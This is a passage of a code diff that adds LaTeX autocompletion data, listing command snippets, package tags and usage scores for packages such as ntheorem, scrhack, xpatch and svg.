+ { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'ntheorem-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'ntheorem-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\newshadedtheorem{}{}', + snippet: '\\newshadedtheorem{$1}{$2}', + meta: 'ntheorem-cmd', + score: 0.0001632850673327423, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'ntheorem-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'ntheorem-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'ntheorem-cmd', + score: 0.215689795055434, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'ntheorem-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'ntheorem-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'ntheorem-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'ntheorem-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'ntheorem-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'ntheorem-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'ntheorem-cmd', + score: 0.0018957469739775527, + }, + ], + tabto: [ + { + caption: '\\tab', + snippet: '\\tab', + meta: 'tabto-cmd', + score: 0.016398493343291305, + }, + { + caption: '\\tab{}', + snippet: '\\tab{$1}', + meta: 'tabto-cmd', + score: 0.016398493343291305, + }, + { + caption: '\\NumTabs{}', + snippet: '\\NumTabs{$1}', + meta: 'tabto-cmd', + score: 0.00011350525217178113, + }, + { + caption: '\\tabto{}{}', + snippet: '\\tabto{$1}{$2}', + 
meta: 'tabto-cmd', + score: 0.002119919034744357, + }, + { + caption: '\\tabto{}', + snippet: '\\tabto{$1}', + meta: 'tabto-cmd', + score: 0.002119919034744357, + }, + ], + emptypage: [ + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'emptypage-cmd', + score: 0.044016804142963585, + }, + ], + abntex2abrev: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'abntex2abrev-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'abntex2abrev-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'abntex2abrev-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'abntex2abrev-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'abntex2abrev-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'abntex2abrev-cmd', + score: 0.0018957469739775527, + }, + ], + scrhack: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrhack-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrhack-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrhack-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\xpatchcmd{}{}{}{}{}', + snippet: '\\xpatchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'scrhack-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\xpatchcmd', + snippet: '\\xpatchcmd', + meta: 'scrhack-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'scrhack-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'scrhack-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'scrhack-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'scrhack-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.0006796212875843042, + }, + { + 
caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'scrhack-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'scrhack-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'scrhack-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'scrhack-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'scrhack-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'scrhack-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'scrhack-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scrhack-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'scrhack-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'scrhack-cmd', + score: 0.2864294797053033, + }, + ], + nth: [ + { + caption: '\\nth{}', + snippet: '\\nth{$1}', + meta: 'nth-cmd', + score: 0.0006155314043974968, + }, + { + caption: '\\thesection', + snippet: '\\thesection', + meta: 'nth-cmd', + score: 0.011068945893347528, + }, + { + caption: '\\thesection{}', + snippet: '\\thesection{$1}', + meta: 'nth-cmd', + score: 0.011068945893347528, + }, + ], + showkeys: [ + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'showkeys-cmd', + score: 1.897791904799601, + }, + ], + fncychap: [ + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'fncychap-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\ChTitleVar{}', + snippet: '\\ChTitleVar{$1}', + meta: 'fncychap-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\thechapter', + snippet: '\\thechapter', + meta: 'fncychap-cmd', + score: 0.011821300392639589, + }, + ], + ae: [ + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'ae-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'ae-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ae-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ae-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ae-cmd', + score: 0.021170869458413965, + }, + ], + asymptote: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 
'asymptote-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'asymptote-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'asymptote-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'asymptote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'asymptote-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'asymptote-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'asymptote-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'asymptote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'asymptote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'asymptote-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'asymptote-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'asymptote-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'asymptote-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'asymptote-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'asymptote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'asymptote-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + 
meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'asymptote-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'asymptote-cmd', + score: 0.008565354665444157, + }, + ], + truncate: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'truncate-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'truncate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'truncate-cmd', + score: 0.021170869458413965, + }, + ], + xpatch: [ + { + caption: '\\xpatchcmd{}{}{}{}{}', + snippet: '\\xpatchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\xpatchcmd', + snippet: '\\xpatchcmd', + meta: 'xpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'xpatch-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'xpatch-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'xpatch-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'xpatch-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xpatch-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'xpatch-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xpatch-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'xpatch-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'xpatch-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'xpatch-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xpatch-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'xpatch-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'xpatch-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.00028992557275763024, + }, + { + 
caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xpatch-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xpatch-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xpatch-cmd', + score: 0.2864294797053033, + }, + ], + totpages: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'totpages-cmd', + score: 0.00037306820619479756, + }, + ], + fourier: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fourier-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fourier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fourier-cmd', + score: 0.021170869458413965, + }, + ], + scrbase: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrbase-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrbase-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrbase-cmd', + score: 0.00037306820619479756, + }, + ], + svg: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'svg-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'svg-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'svg-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'svg-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'svg-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'svg-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'svg-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'svg-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'svg-cmd', + score: 0.017834153815870245, + }, + 
{ + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'svg-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'svg-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'svg-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'svg-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'svg-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + ], + etex: [ + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'etex-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'etex-cmd', + score: 0.00031058155311734754, + }, + ], + linguex: [ + { + caption: '\\Last[]', + snippet: '\\Last[$1]', + meta: 'linguex-cmd', + score: 0.0008163755131430334, + }, + { + caption: '\\Last', + snippet: '\\Last', + meta: 'linguex-cmd', + score: 0.0008163755131430334, + }, + { + caption: '\\Next', + snippet: '\\Next', + meta: 'linguex-cmd', + score: 0.0018776636802289772, + }, + { + caption: '\\Next[]', + snippet: '\\Next[$1]', + meta: 'linguex-cmd', + score: 0.0018776636802289772, + }, + { + caption: '\\LLast[]', + snippet: '\\LLast[$1]', + meta: 'linguex-cmd', + score: 0.00016327510262860667, + }, + { + caption: '\\LLast', + snippet: '\\LLast', + meta: 'linguex-cmd', + score: 0.00016327510262860667, + }, + { + caption: '\\NNext[]', + snippet: '\\NNext[$1]', + meta: 'linguex-cmd', + score: 0.0004490065322286684, + }, + { + caption: '\\NNext', + snippet: '\\NNext', + meta: 'linguex-cmd', + score: 0.0004490065322286684, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'linguex-cmd', + score: 1.897791904799601, + }, + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'linguex-cmd', + score: 0.07560370351316588, + }, + ], + adforn: [ + { + caption: '\\adforn{}', + snippet: '\\adforn{$1}', + meta: 'adforn-cmd', + score: 0.0003148505561835075, + }, + { + caption: '\\ding{}', + snippet: '\\ding{$1}', + meta: 'adforn-cmd', + score: 0.009992300665793867, + }, + ], + bigstrut: [ + { + caption: '\\bigstrut', + snippet: '\\bigstrut', + meta: 'bigstrut-cmd', + score: 0.005498219710082848, + }, + ], + standalone: [ + { + caption: '\\renewcommand{}{}', + snippet: '\\renewcommand{$1}{$2}', + meta: 'standalone-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\renewcommand', + snippet: '\\renewcommand', + meta: 'standalone-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\currfiledir', + snippet: '\\currfiledir', + meta: 'standalone-cmd', + score: 0.0002459788020229296, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'standalone-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: 
'\\noexpand', + meta: 'standalone-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'standalone-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'standalone-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'standalone-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'standalone-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'standalone-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'standalone-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'standalone-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'standalone-cmd', + score: 0.021170869458413965, + }, + ], + ifsym: [ + { + caption: '\\Letter', + snippet: '\\Letter', + meta: 'ifsym-cmd', + score: 0.0012281130571092198, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'ifsym-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ifsym-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ifsym-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'ifsym-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'ifsym-cmd', + score: 0.028955796305270766, + }, + ], + newtxtext: [ + { + caption: '\\textsc{}', + snippet: '\\textsc{$1}', + meta: 'newtxtext-cmd', + score: 0.6926466355384758, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'newtxtext-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'newtxtext-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'newtxtext-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'newtxtext-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'newtxtext-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', 
